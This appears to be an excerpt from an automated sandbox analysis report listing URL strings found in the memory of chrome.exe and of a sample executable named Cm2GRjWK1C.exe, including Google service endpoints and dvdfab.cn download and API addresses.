Source: chrome.exe, 00000008.00000002.1473839638.00001ECC02920000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478434444.00001ECC03644000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477058236.00001ECC0334C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477058236.00001ECC0334C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000008.00000002.1472006930.00001ECC022BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chromecache_69.9.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_69.9.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000008.00000002.1473839638.00001ECC02920000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://adsmeasurement.com
Source: chrome.exe, 00000008.00000002.1479497325.00001ECC03BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417857151.00001ECC02774000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp, chromecache_69.9.dr, chromecache_71.9.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000008.00000002.1477458302.00001ECC034B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-c1.dvdfab.cn/api/
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-c2.DVDFabdvdfab.cnwww.dvdfab.cnDVDFab
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-d1.dvdfab.cn/api/
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-d1.dvdfab.cn/api/common_json_post/
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-j1.dvdfab.cn/api/
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-j1.dvdfab.cn/api/JPNhttps://app-api-c1.dvdfab.cn/api/ENUhttps://app-api-d1.dvdfab.cn
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-j1.dvdfab.cn/api/common_json_post/
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://app-api-j1.dvdfab.cn/api/common_json_post/https://app-api-d1.dvdfab.cn/api/common_json_post/
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://appsflyer.com
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://azubiyo.de
Source: chrome.exe, 00000008.00000002.1474929281.00001ECC02B58000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: chrome.exe, 00000008.00000003.1394242037.00001ECC03814000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417797321.00001ECC02728000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1394147374.00001ECC037CC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1394191951.00001ECC037DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: x4wbi5.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Cm2GRjWK1C.exe, 00000000.00000002.1679863206.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475999818.00001ECC02FC0000.00000004.00001000.00020000.00000000.sdmp, x4wbi5.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Cm2GRjWK1C.exe, 00000000.00000002.1679863206.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475999818.00001ECC02FC0000.00000004.00001000.00020000.00000000.sdmp, x4wbi5.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000008.00000003.1417523038.00001ECC036EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472304064.00001ECC02378000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474605622.00001ECC02AF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: chrome.exe, 00000008.00000002.1468330959.00000241C4EB7000.00000004.10000000.00040000.00000000.sdmp, chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1479380514.00001ECC03AEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476142946.00001ECC03044000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476110867.00001ECC03004000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
Source: chrome.exe, 00000008.00000003.1417500053.00001ECC03698000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1390410228.00001ECC036EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417523038.00001ECC036EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D60000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381776359.00001EC800458000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381842607.00001EC800468000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000008.00000002.1474184732.00001ECC029B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 00000008.00000002.1474184732.00001ECC029B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: chrome.exe, 00000008.00000002.1472304064.00001ECC02378000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000008.00000002.1474964004.00001ECC02B8C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 00000008.00000002.1474964004.00001ECC02B8C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000008.00000003.1380157625.00001D40000DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000008.00000002.1475267325.00001ECC02C80000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472304064.00001ECC02378000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476986237.00001ECC03310000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474870355.00001ECC02B44000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475351535.00001ECC02CBB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000008.00000002.1474115187.00001ECC0298C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chromecache_69.9.dr	String found in binary or memory: https://clients6.google.com
Source: chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chromecache_69.9.dr	String found in binary or memory: https://content.googleapis.com
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 00000008.00000002.1472950525.00001ECC025D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d115.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d115.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d145.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d145.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d17.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d17.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d171.dvdf
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d171.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d171.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d18.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d18.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d207.dv
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d207.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d207.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d217.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d217.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d223.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d223.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d74.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://d74.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dailymail.co.uk
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://dl.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://dl.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://dl.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions7
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chromecache_69.9.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://dr.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://dr.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: x4wbi5.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Cm2GRjWK1C.exe, 00000000.00000002.1679863206.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, x4wbi5.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: x4wbi5.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ebayadservices.c
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://elle.com
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://finn.no
Source: chrome.exe, 00000008.00000003.1394442372.00001ECC038F4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1394490638.00001ECC0388C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417628655.00001ECC03928000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fonts.google.com/icons?selected=Material
Source: chromecache_71.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_71.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_71.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_71.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: x4wbi5.0.dr	String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic/intro?
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic/intro?20
